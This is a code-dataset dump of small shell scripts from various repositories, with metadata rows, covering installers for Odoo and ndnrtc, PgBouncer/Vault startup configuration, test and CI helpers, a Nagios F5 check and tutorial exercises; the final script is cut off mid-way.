blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
7e14d6d8293daea7531f9ae91a55cec4e37027c2
|
Shell
|
luissilv4/SO
|
/p3.sh
|
UTF-8
| 246
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
# Troca a extensao de um ficheiro — renames every *.<old> file in the current
# directory to *.<new>, reading both extensions interactively.
read -p "Introduza a extensão a alterar: " extensao
read -p "Introduza a extensão que pretende: " extensao1
for ficheiro in *.$extensao
do
  # If nothing matched, the glob stays literal ("*.<ext>"); skip it instead of
  # trying to rename a non-existent file.
  [ -e "$ficheiro" ] || continue
  # '--' protects file names that begin with a dash.
  mv -- "$ficheiro" "${ficheiro%.$extensao}.$extensao1"
done
| true
|
9481238f443e40c99fc1a2454ea00ad6e2cfab7f
|
Shell
|
andrevinsky/testid-support
|
/ensure-variables-and-paths.sh
|
UTF-8
| 928
| 2.96875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Prepare clean output directories for jest / CI runs and export their paths.
set -e

# Root directory for all jest reports; default to ./reports when unset/empty.
[[ -n "$JEST_JUNIT_OUTPUT_DIR_PARENT" ]] || export JEST_JUNIT_OUTPUT_DIR_PARENT="$(pwd)/reports"
echo "JEST_JUNIT_OUTPUT_DIR_PARENT=$JEST_JUNIT_OUTPUT_DIR_PARENT"

# Start every run from a clean slate.
rm -rf "$JEST_JUNIT_OUTPUT_DIR_PARENT"
mkdir -p "$JEST_JUNIT_OUTPUT_DIR_PARENT"

# junit XML output location.
if [[ -z "$JEST_JUNIT_OUTPUT_DIR" ]]; then
  export JEST_JUNIT_OUTPUT_DIR="$JEST_JUNIT_OUTPUT_DIR_PARENT/junit"
  mkdir -p "$JEST_JUNIT_OUTPUT_DIR"
fi

# Coverage output location.
if [[ -z "$JEST_COVERAGE_OUTPUT_DIR" ]]; then
  export JEST_COVERAGE_OUTPUT_DIR="$JEST_JUNIT_OUTPUT_DIR_PARENT/coverage"
  mkdir -p "$JEST_COVERAGE_OUTPUT_DIR"
fi
echo "JEST_JUNIT_OUTPUT_DIR=$JEST_JUNIT_OUTPUT_DIR"
echo "JEST_COVERAGE_OUTPUT_DIR=$JEST_COVERAGE_OUTPUT_DIR"

# Directory for CI artifacts (npm logs etc.); defaults to ./ci-artifacts.
if [[ -z "$CI_ARTIFACTS_PATH" ]]; then
  export CI_ARTIFACTS_PATH="$(pwd)/ci-artifacts"
  mkdir -p "$CI_ARTIFACTS_PATH"
fi
echo "CI_ARTIFACTS_PATH=$CI_ARTIFACTS_PATH"
mkdir -p "$CI_ARTIFACTS_PATH/npm-logs"
| true
|
bc901493980bd64ed4493ac7fc9db1388f9c34f9
|
Shell
|
amine784/holberton-system_engineering-devops
|
/0x04-loops_conditions_and_parsing/4-if_9_say_hi
|
UTF-8
| 198
| 3.0625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# A Bash script that displays "Holberton School" 10 times using until,
# printing "Hi" just before the final line (when the counter reaches 9).
c=0
until (( c >= 10 )); do
  if (( c == 9 )); then
    echo "Hi"
  fi
  echo "Holberton School"
  (( c++ ))
done
| true
|
f7d51173628c2598c8dd34bfcdaf16f7329aea48
|
Shell
|
NguyenAzai/data1
|
/install-odoo11-on-ubuntu-bash.sh
|
UTF-8
| 1,897
| 2.671875
| 3
|
[] |
no_license
|
#!/bin/bash
# Unattended installer for Odoo 11 on Ubuntu (the interpreter line was missing).
# Installs system packages, PostgreSQL, wkhtmltopdf, checks out Odoo 11 into a
# virtualenv under /opt/odoo11 and writes /etc/odoo11.conf. Requires sudo.
sudo apt-get update -y
sudo apt-get upgrade -y
sudo apt install git python3-pip build-essential wget python3-dev python3-venv python3-wheel libxslt-dev libzip-dev libldap2-dev libsasl2-dev python3-setuptools node-less -y
sudo useradd -m -d /opt/odoo11 -U -r -s /bin/bash odoo11
sudo apt-get install node-clean-css -y
sudo apt-get install node-less -y
sudo apt-get install python-gevent -y
# PostgreSQL server plus the odoo11 database role
sudo apt install postgresql -y
sudo service postgresql start
sudo su - postgres -c "createuser -s odoo11"
sudo su - postgres -c "psql -c 'create role odoo11 with login superuser;'"
# wkhtmltopdf is needed by Odoo for PDF report rendering
wget https://github.com/wkhtmltopdf/wkhtmltopdf/releases/download/0.12.5/wkhtmltox_0.12.5-1.bionic_amd64.deb
sudo apt install ./wkhtmltox_0.12.5-1.bionic_amd64.deb -y
# Odoo sources and python virtualenv, owned by the odoo11 user
sudo su - odoo11 -c "git clone https://www.github.com/odoo/odoo --depth 1 --branch 11.0 /opt/odoo11/odoo"
sudo su - odoo11 -c "cd /opt/odoo11 && python3 -m venv odoo-venv && source odoo-venv/bin/activate && pip3 install wheel && pip3 install -r odoo/requirements.txt && deactivate"
sudo su - odoo11 -c "mkdir /opt/odoo11/odoo-custom-addons"
# Write the server configuration file line by line
sudo touch /etc/odoo11.conf
sudo su root -c "printf '[options] \n; This is the password that allows database operations:\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'admin_passwd = my_admin_passwd\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'xmlrpc_port = 9069\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'db_host = False\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'db_port = False\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'db_user = odoo11\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'db_password = False\n' >> /etc/odoo11.conf"
sudo su root -c "printf 'addons_path = /opt/odoo11/odoo/addons,/opt/odoo11/odoo-custom-addons\n' >> /etc/odoo11.conf"
sudo chown odoo11:odoo11 /etc/odoo11.conf
sudo chmod 640 /etc/odoo11.conf
echo "Installation Done"
| true
|
79534256f8045a678ce6e26cb54503723cc6c872
|
Shell
|
andy2046/bitmap
|
/scripts/help.sh
|
UTF-8
| 173
| 2.734375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Print a usage summary for the Makefile: every line marked with "##".
set -euo pipefail

echo 'usage: make [target] ...'
echo
echo 'targets:'
# fgrep is deprecated in GNU grep; grep -F is the supported spelling.
# The filter pattern stays the literal string "fgrep" to keep the same lines
# excluded as before.
grep -Fh "##" ./Makefile | grep -Fv fgrep | sed -e 's/\\$$//' | sed -e 's/##//'
| true
|
1254483967f088752b8e682b4b7ccdfa79720742
|
Shell
|
wordswords/dotfiles
|
/bin/search-ebooks.sh
|
UTF-8
| 242
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
# Fuzzy-search the ebook library for an epub whose name contains the script's
# arguments, then open the chosen file with epy.
set -e

BOOKPATHROOT=/mnt/ebooks
EPY_PATH="/home/david/.local/bin/epy"
# Glob pattern: anything, then the arguments joined by $*, then anything ending in .epub
PARAMS="*$**.epub"

cd "${BOOKPATHROOT}"
# Newest-first listing piped into fzf; --disabled turns off fzf's own filtering.
bookpath="$(find . -type f -iname "${PARAMS}" 2>/dev/null | sort -r | fzf --disabled)"
"${EPY_PATH}" "${bookpath}"
cd -
| true
|
248417c80bdeceec8a87422792d11acdc7bc58af
|
Shell
|
amazon-biobank/biobank
|
/blockchain/test-network/createUserAccount.sh
|
UTF-8
| 490
| 2.578125
| 3
|
[] |
no_license
|
#!/bin/bash
# Run the createUserAccount functional test for the currency contract, then
# encrypt the resulting wallet identity and drop e-admin.id at the repo root.
cd ./../currency-contract
node_modules/.bin/mocha functionalTests/AccountContract-biobank.test.js --grep="createUserAccount"
# Read wallet location and identity name from config.json (jq reads the file
# directly; the original piped it through cat needlessly).
WALLET_PATH=$(jq '.walletPath' config.json | tr -d \")
IDENTITY_NAME=$(jq '.identityName' config.json | tr -d \")
cd -
GREEN='\033[0;32m'
NC='\033[0m'
cd ../../application/encryptCertificate/src/
node encryptCredentials.js ~/$WALLET_PATH "${IDENTITY_NAME}.id" amazonbiobank
mv e-admin.id ./../../../
# BUG FIX: the closing double quote was missing here, which made the shell
# swallow the following 'cd -' line into the echoed string.
echo -e "${GREEN} generated e-admin.id ${NC}"
cd -
| true
|
061279d50a757bb3125bce559e629fca2900e58b
|
Shell
|
mindvalley/tf-module-pgbouncer-mig
|
/scripts/startup.sh.tpl
|
UTF-8
| 6,329
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# This script is meant to be run as the Startup Script of a Compute Instance
# while it's booting. Afterwards it performs the necessary api requests to login
# to a Vault cluster. At the end it also serves a simple webserver with a message
# read from Vault, for test purposes, so we can curl the response and test that
# the authentication example is working as expected.
# NOTE(review): this file is a Terraform template (*.tpl); the ${...} and
# %{...} sequences below are rendered by Terraform before the script runs.
set -e
# Send the log output from this script to startup-script.log, syslog, and the console
# Inspired by https://alestic.com/2010/12/ec2-user-data-output/
exec > >(tee /var/log/startup-script.log|logger -t startup-script -s 2>/dev/console) 2>&1
# Log a message to stderr, prefixed with a timestamp.
function log {
  local -r message="$1"
  # BUG FIX: 'local readonly timestamp=…' declared an empty variable literally
  # named "readonly"; 'local -r' is the correct read-only local declaration
  # (and matches the line above).
  local -r timestamp=$(date +"%Y-%m-%d %H:%M:%S")
  >&2 echo -e "$timestamp $message"
}
# A retry function that attempts to run a command a number of times and returns the output
# The command string is eval'ed up to 30 times (10s between attempts); on the
# first success its stdout is echoed and the function returns. If every attempt
# fails, the WHOLE script exits with the last failure's status.
function retry {
local -r cmd="$1"
local -r description="$2"
for i in $(seq 1 30); do
log "$description"
# The boolean operations with the exit status are there to temporarily circumvent the "set -e" at the
# beginning of this script which exits the script immediatelly for error status while not losing the exit status code
output=$(eval "$cmd") && exit_status=0 || exit_status=$?
log "$output"
if [[ $exit_status -eq 0 ]]; then
echo "$output"
return
fi
log "$description failed. Will sleep for 10 seconds and try again."
sleep 10
done;
log "$description failed after 30 attempts."
# Abort the whole script, propagating the failing command's status.
exit $exit_status
}
# ==========================================================
# BEGIN TO CONFIGURE THE INSTANCE
# ==========================================================
# Ensure the vault agent is configured with proper contents & templates
mkdir -p /etc/vault
# consul-template source rendered by the Vault agent into the PgBouncer
# userlist. %{ for }/${ } are Terraform directives expanded at render time;
# the {{ }} blocks are consul-template syntax left for the agent.
cat <<EOF > /etc/vault/pgbouncer-userlist.ctmpl
"statsuser" = "somereallyfakestringthatdoesnothaveanymeaningatall"
%{ for db in enabled_databases }
{{ with secret "${db.password_vault_secret_path}" }}
"${db.username}" = "{{ .Data.postgres_db_password }}"
{{ end }}
%{ endfor ~}
EOF
# Create needed PgBouncer configuration files
cat <<EOF > /etc/pgbouncer/pgbouncer.ini
[databases]
%{ for db in enabled_databases }
${db.name} = host=${db.host} port=${db.port} dbname=${db.name} pool_size=${db.pool_size} user=${db.username}
%{ endfor ~}
[pgbouncer]
listen_port=${pgbouncer_config.listen_port}
listen_addr=${pgbouncer_config.listen_addr}
max_client_conn=${pgbouncer_config.max_client_conn}
unix_socket_dir=/tmp
auth_file=/etc/pgbouncer/userlist.txt
auth_hba_file=/etc/pgbouncer/pg_hba.conf
auth_type=hba
stats_users=statsuser
pool_mode=transaction
client_tls_sslmode=disable
ignore_startup_parameters = extra_float_digits
stats_period=10
syslog=1
EOF
cat <<EOF > /etc/pgbouncer/pg_hba.conf
# Allow any user on the local system to connect to any database with
# any database user name using Unix-domain sockets (the default for local
# connections).
#
# TYPE DATABASE USER ADDRESS METHOD
local all statsuser trust
host all all 0.0.0.0/0 md5
EOF
# Create Vault agent config
# Auto-auth via the GCE metadata method; the agent renders the userlist
# template above into PgBouncer's auth_file.
cat <<EOF > /etc/vault/config.hcl
pid_file = "/tmp/vault.pid"
vault {
address = "${vault_config.vault_server_address}"
tls_skip_verify = "${vault_config.tls_skip_verify}"
retry {
num_retries = 5
}
}
auto_auth {
method "gcp" {
config = {
type = "gce"
role = "${vault_config.vault_cluster_role}"
}
}
}
template {
source = "/etc/vault/pgbouncer-userlist.ctmpl"
destination = "/etc/pgbouncer/userlist.txt"
}
EOF
# Ensure the supervisord's program are presented
# (one supervisor program per service; numeric prefixes order the conf files)
## PgBouncer
cat <<EOF > /etc/supervisor/conf.d/10-pgbouncer.conf
[program:pgbouncer]
command=/usr/sbin/pgbouncer /etc/pgbouncer/pgbouncer.ini
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=10
autostart=true
autorestart=unexpected
startsecs=10
startretries=3
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=postgres
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
EOF
## PgBouncer Exporter
cat <<EOF > /etc/supervisor/conf.d/11-pgbouncer-exporter.conf
[program:pgbouncer-exporter]
command=/usr/local/bin/pgbouncer_exporter --pgBouncer.connectionString="postgresql:///pgbouncer?host=/tmp&port=6432&sslmode=disable&user=statsuser"
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=11
autostart=true
autorestart=unexpected
startsecs=10
startretries=5
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=postgres
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
EOF
## PgBouncer Healthcheck
cat <<EOF > /etc/supervisor/conf.d/12-pgbouncer-health-check.conf
[program:pgbouncer-healthcheck]
command=/usr/local/bin/pgbouncer-healthcheck
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=12
autostart=true
autorestart=unexpected
startsecs=10
startretries=5
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=postgres
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
environment=CONNSTR="host=/tmp port=6432 user=statsuser dbname=pgbouncer sslmode=disable",ENHANCED_CHECK="true"
EOF
## Node-Exporter
cat <<EOF > /etc/supervisor/conf.d/13-node-exporter.conf
[program:node-exporter]
command=/usr/local/bin/node_exporter
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=13
autostart=true
autorestart=unexpected
startsecs=10
startretries=5
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=nobody
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
EOF
## Vault Agent
# priority=1 so the agent starts first and can render PgBouncer's userlist.
cat << EOF > /etc/supervisor/conf.d/14-vault.conf
[program:vault-agent]
command=/usr/local/bin/vault agent -config=/etc/vault/config.hcl
process_name=%(program_name)s
numprocs=1
directory=/tmp
umask=022
priority=1
autostart=true
autorestart=unexpected
startsecs=10
startretries=5
exitcodes=0
stopsignal=TERM
stopwaitsecs=10
stopasgroup=false
killasgroup=false
user=root
serverurl=AUTO
stdout_syslog=true
stderr_syslog=true
EOF
# Restart services
# Hand PgBouncer over from systemd to supervisor (each step retried).
retry "systemctl stop pgbouncer" "Stop Pgbouncer"
retry "systemctl disable pgbouncer" "Disable Pgbouncer from systemd"
retry "systemctl restart supervisor" "Restart Supervisor"
| true
|
950fb2237ddf25c5951527b45772ff68a9b3589a
|
Shell
|
amyq7526110/ebook
|
/chapter9/E_9_6_2.sh
|
UTF-8
| 430
| 2.78125
| 3
|
[] |
no_license
|
#!/bin/bash
# cat "$@" -
# Invoke this script as: ./scriptname 1 2 3 4 5
echo "$@" # 1 2 3 4 5
shift
echo "$@" # 2 3 4 5
shift
echo "$@" # 3 4 5
# Each shift discards $1.
# "$@" will then contain the remaining arguments.
# $@ is also usable as a tool to filter the input passed to a script.
# The cat "$@" construct accepts input from stdin as well as from the files named in the arguments.
| true
|
4f90fec5f23bf5778ed932698ec901b47f604683
|
Shell
|
k0kk0k/keep-tBTC-minter
|
/run.sh
|
UTF-8
| 861
| 3.109375
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/bash
# `run.sh` can help you start multiple processes at the same time, you can use crontab
# */10 * * * * cd ~/keep-tbtc-minter && /usr/bin/nohup /bin/bash run.sh sendBtc 1 >> log_run.log 2>&1 &
# */3 * * * * cd ~/keep-tbtc-minter && /usr/bin/nohup /bin/bash run.sh deposit 10 >> log_run.log 2>&1 &
# */3 * * * * cd ~/keep-tbtc-minter && /usr/bin/nohup /bin/bash run.sh resume 10 >> log_run.log 2>&1 &

# Node binary plus flags; expanded unquoted below on purpose so the flags
# split into separate words.
node_exp="/home/ubuntu/.nvm/versions/node/v12.18.2/bin/node --experimental-json-modules --experimental-modules"

action=$1            # sub-command forwarded to index.js (sendBtc, deposit, resume, ...)
threadNum=${2:-0}    # worker count; default 0 (previously an empty $2 broke the for loop)

echo "================$(date) Action $action with $threadNum thread"

# Kill any previous workers for this action. 'xargs -r' keeps kill from being
# invoked with no PIDs when nothing matched.
ps -ef | grep "index.js ${action}" | grep -v grep | awk '{print $2}' | xargs -r kill -9

for ((i = 0; i < threadNum; ++i)); do
  echo "$(date) ===Start $action #$i===="
  /usr/bin/nohup $node_exp index.js "$action" >> "log_${action}.log" 2>&1 &
done
| true
|
6a431ba60224f649906d9e61093ca2b4ab8f809e
|
Shell
|
mitchpaulus/dotfiles
|
/scripts/group_count
|
UTF-8
| 223
| 3.21875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# Count occurrences of each distinct value of a whitespace-delimited field
# read from stdin. Usage: group_count <field number>
#
# BUG FIX: the original '[ $# -ne 1 ] || [ "$1" -lt 1 ]' let non-numeric
# arguments through — on a non-integer operand test(1) returns status 2,
# which the || chain treats as "false". Negating a -ge check rejects both
# non-integers and values < 1.
if [ $# -ne 1 ] || ! [ "$1" -ge 1 ] 2>/dev/null; then
  echo "Usage: $0 <field number>"
  exit 1
fi

# Print the requested field, then count duplicates and sort by version order.
awk -F ' ' '{print $'"$1"'}' | mpuniq -c | sort -V
| true
|
345eea2cfc0995ec9b21d992b548558dd41d7e1b
|
Shell
|
jmckaskill/tup
|
/test/t5044-ghost-dir-to-file.sh
|
UTF-8
| 494
| 3.09375
| 3
|
[] |
no_license
|
#! /bin/sh -e
# Make sure changing a ghost dir to a real file works. Basically the same as
# t5044, only we're checking to see that a file can still have ghost children.
. ./tup.sh
cat > Tupfile << HERE
: |> (cat secret/ghost || echo nofile) > %o |> output.txt
HERE
tup touch Tupfile
update
# secret/ghost doesn't exist yet, so the rule falls back to "nofile".
echo nofile | diff - output.txt
# Turn the ghost directory's path into a plain file, then remove it again.
touch secret
tup touch secret
update
rm secret
tup rm secret
# Now make 'secret' a real directory with a real 'ghost' file inside and
# verify the rule picks up its contents.
tmkdir secret
echo boo > secret/ghost
tup touch secret/ghost
update
echo boo | diff - output.txt
eotup
| true
|
2d00a7176859f11a8289c54554859389b8f49f60
|
Shell
|
bdashrad/nagios-plugins
|
/check_f5_status
|
UTF-8
| 1,288
| 3.921875
| 4
|
[] |
no_license
|
#!/bin/bash
# Checks if BIG-IP LTM is Active or Failover (Nagios plugin)
# Usage: check_f5_status -H host -C community -S (active|standby)

# Configuration
snmpget="/usr/bin/snmpget"
community=""
snmpversion=2c

# nagios return values
export STATE_OK=0
export STATE_WARNING=1
export STATE_CRITICAL=2
export STATE_UNKNOWN=3
export STATE_DEPENDENT=4

if [ $# -lt 1 ]; then
  echo "Usage: $0 -H host -C community -S (active|standby)"
  exit
fi

while getopts ":H:C:S:" opt; do
  case $opt in
    H) host=$OPTARG ;;
    C) community=$OPTARG ;;
    S) expected=$OPTARG ;;
    \?)
      echo "Invalid option: -$OPTARG" >&2
      # Keep the usage text consistent with the -S form accepted above
      # (the original advertised nonexistent -w/-c options here).
      echo "Usage: $0 -H host -C community -S (active|standby)"
      exit
      ;;
    :)
      echo "Option -$OPTARG requires an argument" >&2
      exit
      ;;
  esac
done

# F5 failover status OID
oid=1.3.6.1.4.1.3375.2.1.1.1.1.19.0

case $expected in
  active)
    expectedStatus=3
    ;;
  standby)
    expectedStatus=0
    ;;
  *)
    echo "Expected Status must be 'active' or 'standby'"
    exit
    ;;
esac

# BUG FIX: use the configured $snmpget binary and $snmpversion — both were
# defined but ignored (the command hardcoded 'snmpget' and '-v 2c').
STATUS=$("$snmpget" -Ov -v "$snmpversion" -c "$community" "$host" "$oid" | awk '{print $2}')

case $STATUS in
  0) status="standby" ;;
  1) status="active-1" ;;
  2) status="active-2" ;;
  3) status="active" ;;
esac

# BUG FIX: returnValue was never initialized, so on a successful match
# 'exit $returnValue' became a bare 'exit' relying on the previous command's
# status. A string compare also avoids a test(1) error when SNMP returns
# nothing and $STATUS is empty (mismatch -> WARNING).
returnValue=$STATE_OK
if [ "$STATUS" != "$expectedStatus" ]; then
  returnValue=$STATE_WARNING
fi

outMessage="Current State: ${status} - Expected: ${expected} | 'Status'=$STATUS"
echo -e $outMessage
exit $returnValue
| true
|
b53f4d10784d882010a2ed4475ef1822db9de859
|
Shell
|
SunnyQjm/NDNInstaller
|
/install_ndnrtc.sh
|
UTF-8
| 2,450
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
# Common function and variable definitions (DEFAULT_DIR and cloneOrUpdate are
# expected to come from here)
source ./common.sh
NDN_CPP_VERSION=v0.16
NDNRTC_VERSION=v3.0.2
# install pre
echo 'install pre'
sudo apt-get install cmake wget autoconf automake libtool git protobuf-compiler libconfig++-dev libconfig++9v5
cd ${DEFAULT_DIR}
mkdir ndnrtc-env
cd ndnrtc-env
export NDNRTC_ENV=`pwd`
# depot_tools.git — Chromium's fetch/gclient tooling, needed to build WebRTC
cd $NDNRTC_ENV
echo 'begin install depot_tools to: '`pwd`
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
export PATH=$PATH:`pwd`/depot_tools
echo 'install depot_tools finished'
# webrtc — checked out at branch-heads/59 and built in release mode
cd $NDNRTC_ENV
echo 'begin install webrtc'
mkdir webrtc-checkout
cd webrtc-checkout/
echo 'begin fetch webrtc: '`pwd`
fetch --nohooks webrtc
cd src
git checkout -b branch-heads-59 refs/remotes/branch-heads/59
echo 'do gclient in: '`pwd`
gclient sync
./build/install-build-deps.sh
gn gen out/Default --args='is_debug=false'
ninja -C out/Default
# ndn-cpp
cd $NDNRTC_ENV
echo 'begin install ndn-cpp:'`pwd`
# Temporarily point DEFAULT_DIR at the ndnrtc env for cloneOrUpdate, restore after.
OLD_DEFAULT_DIR=${DEFAULT_DIR}
DEFAULT_DIR=${NDNRTC_ENV}
sudo apt install build-essential libssl-dev libsqlite3-dev libprotobuf-dev protobuf-compiler \
liblog4cxx-dev doxygen -y
cloneOrUpdate ndn-cpp https://github.com/named-data/ndn-cpp/archive/${NDN_CPP_VERSION}.tar.gz ndn-cpp
mkdir -p build/share
# NOTE(review): there is no explicit cd into the ndn-cpp checkout before
# ./configure — presumably cloneOrUpdate (from common.sh) leaves the cwd
# there; verify against common.sh.
./configure --with-std-shared-ptr=no --with-std-function=no --prefix=$(pwd)/build
make
sudo make install
DEFAULT_DIR=${OLD_DEFAULT_DIR}
echo 'install ndn-cpp finished! => '`pwd`
# install OpenFEC (patched for ndnrtc before building)
cd $NDNRTC_ENV
wget http://openfec.org/files/openfec_v1_4_2.tgz
tar -xvf openfec_v1_4_2.tgz && rm openfec_v1_4_2.tgz
mkdir -p openfec_v1.4.2/build && cd openfec_v1.4.2/
wget https://raw.githubusercontent.com/remap/ndnrtc/master/cpp/resources/ndnrtc-openfec.patch && patch src/CMakeLists.txt ndnrtc-openfec.patch
cd build/
cmake .. -DDEBUG:STRING=OFF
make
# install ndnrtc — config.site points configure at the dependencies built above
DEFAULT_DIR=${NDNRTC_ENV}
cloneOrUpdate ndnrtc https://github.com/remap/ndnrtc/archive/${NDNRTC_VERSION}.tar.gz ndnrtc
cd cpp
mkdir -p build/share
echo 'CPPFLAGS="-g -O2 -DWEBRTC_POSIX" CXXFLAGS="-g -O2 -DWEBRTC_POSIX"' > build/share/config.site
echo NDNCPPDIR=`pwd`/../../ndn-cpp/build/include >> build/share/config.site
echo NDNCPPLIB=`pwd`/../../ndn-cpp/build/lib >> build/share/config.site
echo OPENFECDIR=`pwd`/../../openfec_v1.4.2 >> build/share/config.site
echo WEBRTCDIR=`pwd`/../../webrtc-checkout/src >> build/share/config.site
./configure --prefix=$(pwd)/build
make && make install
| true
|
b026674f6a5d520f38b964c20cedcf184445ec8e
|
Shell
|
unixorn/tumult.plugin.zsh
|
/bin/markdown-open
|
UTF-8
| 937
| 3.78125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# https://github.com/rtomayko/dotfiles/blob/rtomayko/bin/markdown-open
#
# Render a markdown/text file (or stdin) to HTML with sundown, open it in the
# default browser, then remove the temporary HTML file.

if [[ "$(uname -s)" != 'Darwin' ]]; then
  echo 'Sorry, this script only works on macOS'
  exit 1
fi

# debug helper: echo arguments to stderr
function debug() {
  echo "$@" 1>&2
}

f=$1
# No file argument (or "-"): spool stdin into a temp file that is removed on exit.
if [ -z "$f" ] || [ "$f" = "-" ] ; then
  f=/tmp/markdown-$$.txt
  cat > "$f"
  trap 'rm -f "$f"' 0
fi

# Derive the HTML name next to the input: strip a trailing .txt, append .html.
# BUG FIX: $f and $bn are now quoted throughout so paths containing spaces work.
bn=$(basename "$f" | sed 's:^\(.*\)\.txt$:\1:')
html_file="$(dirname "$f")/$bn.html"

# HTML prologue with GitHub-ish styling
cat <<EOF > "$html_file"
<html>
<head>
<title>$f</title>
<link href="https://github.com/assets/github.css" media="screen" rel="stylesheet" type="text/css" />
<style type="text/css">
div#container {
max-width: 852px;
margin: 50px auto;
}
</style>
<body>
<div id="container" class="markdown-body">
EOF

# Render the markdown body, then close out the document.
sundown < "$f" >> "$html_file"
cat <<EOF >> "$html_file"
</div>
</body>
</html>
EOF
rslt=$?
[ $rslt != 0 ] && exit $rslt

# Open in the default browser; give it a moment to load before deleting.
open "$html_file"
sleep 0.5
unlink "$html_file"
| true
|
d78d35d786868dd935ce05c6309d77df55ed7a1b
|
Shell
|
patrickfarias/ritchie-formulas
|
/kubernetes/clean/helm-configmap/src/helm-configmap/helm-configmap.sh
|
UTF-8
| 390
| 3.109375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
# Prune old versioned ConfigMaps ("<name>.vN") in kube-system, keeping the two
# highest-numbered versions of each base name.
run() {
# Distinct base names: first column, part before the first '.', header row dropped.
CONFIGMAP_LIST=$(kubectl -n kube-system get configmap |awk '{print $1}'|cut -f1 -d.|sort|uniq|grep -v 'NAME');
for i in $CONFIGMAP_LIST;
do echo "$i";
# For each base name: extract its numeric versions, drop the two newest
# (head -n -2 on the ascending sort), and delete the remaining "<name>.v<j>" maps.
for j in $(kubectl -n kube-system get configmap | grep "$i" | awk '{print $1}'|cut -d. -f2|cut -dv -f2| sort -n | head -n -2); do echo "$i".v"$j"; kubectl -n kube-system delete configmap "$i".v"$j" ; done; done
}
| true
|
60a9a3419db5c5c9cb9ed5a593a5735ed609c864
|
Shell
|
JakeGuy11/dotfiles
|
/install-programs.sh
|
UTF-8
| 985
| 2.8125
| 3
|
[] |
no_license
|
#!/usr/bin/bash
# This will install all my other programs
# (Arch Linux; uses doas instead of sudo. lib32-mesa and steam need the
# multilib repository enabled.)
read -p "Once you have ensured multilib is enabled in '/etc/pacman.conf' and press enter"
ARCH_PACKAGES=""
# Just so I can keep track of what packages are what, I'll add them incrementally here
# Basic programming packages and libraries
ARCH_PACKAGES+="gcc
python
python-pip
wget
curl
jdk-openjdk
jre-openjdk
jre-openjdk-headless
nodejs
npm
"
# Fonts, languages, etc.
ARCH_PACKAGES+="fcitx-im
fcitx-mozc
fcitx-configtool
adobe-source-han-sans-jp-fonts
adobe-source-han-sans-kr-fonts
ttf-liberation
wqy-zenhei
noto-fonts-emoji
"
# Audio/Visual
ARCH_PACKAGES+="ffmpeg
youtube-dl
blender
gimp
inkscape
mkvtoolnix-cli
audacity
vlc
cmus
xf86-video-intel
mesa
lib32-mesa
pavucontrol
redshift
scrot
"
# Archives/File stuff
ARCH_PACKAGES+="ark
p7zip
tree
unzip
zip
"
# Internet/browser stuff
ARCH_PACKAGES+="discord
qbittorrent
steam
tor
torbrowser-launcher
vivaldi"
echo "$ARCH_PACKAGES"
# $ARCH_PACKAGES is intentionally unquoted here so each newline-separated
# package name becomes its own pacman argument.
doas -- pacman -Syu $ARCH_PACKAGES
| true
|
1d3b7ca3dbdc6abb1444ea15f20f1d33bcc6f269
|
Shell
|
iceFeeder/sscriptss
|
/backup/contrail-hamon
|
UTF-8
| 697
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
# chkconfig: 2345 99 01
# description: contrail-hamon service
# SysV init wrapper around upstart-style start/stop/status commands.
. /etc/rc.d/init.d/functions
case "$1" in
start)
# contral-hamon startup
echo -n "Starting contral-hamon: "
# BUG FIX: 'exec start …' replaced this shell, so the "OK" below could
# never print; invoke the command normally instead.
start contrail-hamon
echo "OK"
;;
stop)
# contral-hamon shutdown
echo -n "Shutdown contral-hamon: "
stop contrail-hamon
echo "OK"
;;
reload|restart)
$0 stop
$0 start
;;
status)
# BUG FIX: likewise, 'exec status …' made 'exit $?' unreachable.
status contrail-hamon
#status -p $pid_file cassandra
exit $?
;;
*)
echo "Usage: `basename $0` start|stop|status|restart|reload"
exit 1
esac
exit 0
| true
|
e3d7f7698366c314de7410c8bc7b42eabdb71041
|
Shell
|
hitswint/.emacs.d
|
/dotfiles/bin/external-edit
|
UTF-8
| 1,853
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
# Grab the selection (or, with -s, the whole buffer) of the focused X window,
# hand it to an external editor, then paste the edited text back.
while getopts "se:" arg # a colon after an option letter means it takes an argument
do
case $arg in
s)
sel=1
;;
e)
editor=$OPTARG # the option's argument is stored in $OPTARG
;;
